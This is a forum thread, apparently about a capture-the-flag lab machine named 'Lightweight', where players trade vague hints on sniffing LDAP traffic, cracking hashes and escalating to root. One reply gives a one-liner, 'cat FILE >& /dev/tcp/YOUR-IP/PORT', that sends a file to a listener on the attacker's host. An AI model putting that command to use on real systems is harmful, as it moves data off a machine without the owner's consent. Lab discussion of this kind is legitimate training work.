Lightweight

Stuck at the root stage.
Found user.txt.
Found files in /home/ldapuser1 but don’t know how to leverage them to gain root.
Tried to search for certificates and keys to decrypt trafic in pcap but no luck.
Any help would be appreciated.

Anyone available to PM me on the first user?

I have low privilege shell(using my ip) and two ldap hashes. Cracking it isn’t working. What am I missing? Can someone give a nudge?
EDIT:Got something from tcp****, but unable to modify l*** using this.

Ok, this was a strange box. I owned it in 2.5 hours but started to read hints in forum too early! There is more than enough written in this thread. Do not read it if you want to have more fun. This tips will be enough:

User: Tcpdump Examples - 22 Tactical Commands | HackerTarget.com & remember that you can switch users & The LDAP Bind Operation – LDAP.com
Root: Inheritance

As usual PM me if help needed :slight_smile:

Just root’ed - really great box, learned a lot here!
PM me if you need any help.

Nice Box. Learned new stuff. Good stuff.

currently i only got the nmap creds(lduser1&lduser2 with both the {crypts} + ssh into the box.

and I’m trying to find a way to get into the user without cracking the hashes (as i’ve seen people suggest) however I cant seem to get any progress…

Anyone got advice on how to proceed ? ( or what to listen on in the ssh-shell?)

Man i am just lost on this one. Can’t figure out what is needed to trigger the ldap bind request i am trying to capture. If anyone can shoot me a PM on the initial user part, it would be much appreciated.

Type your comment> @bu77er0verfl0w said:

Got User, working on root, I’ve done the whole cap privesc on a different box, cant remember which one atm. So I should pop this bad boy before I head to bed tonight. But before I finish and write my review I want to share a quick tip for anyone doing this box who is having trouble transfering files

cat FILE >& /dev/tcp/YOUR-IP/PORT

should do the trick, just dont forget to setup a netcat listener on your kali box that pipes out to a file.

Thanks for the tip! I went through the process of base64 encoding it and which was a pain.

Rooted
Great box! : +1
PM if you need a nudge :slight_smile:

Hmm, did the t*****p phase, have hash for l*******2 but no idea how to use it. Google did not help.
Can anyone PM me with a small hint ?

Edit: Found it in the meantime

Nice box. Rooted :slight_smile:

Got user, nice task. Not so fun listening to the messy traffic.
Anyone needing help, drop me a dm.

Rooted!
I’m really interested how everyone else did it. Anyone fancy having a conversation on how they did it? would like to know other ways, maybe how to get shell too!

I didn’t get any lead after spending two days. Need some help to me. Anyone please.

How long it will take to capture the password!!

Nevermind! I did it.

Hello all, a bit late to the party, but better late than never.
I started on this box, with optimism, and is still optimistic!
I have read through all comments on this forum for hints along the way.
l2 ok, l1 ok, root read ok, but have a question about root shell, anyone available for a PM?

Box now in retired… :frowning: still in free

Type your comment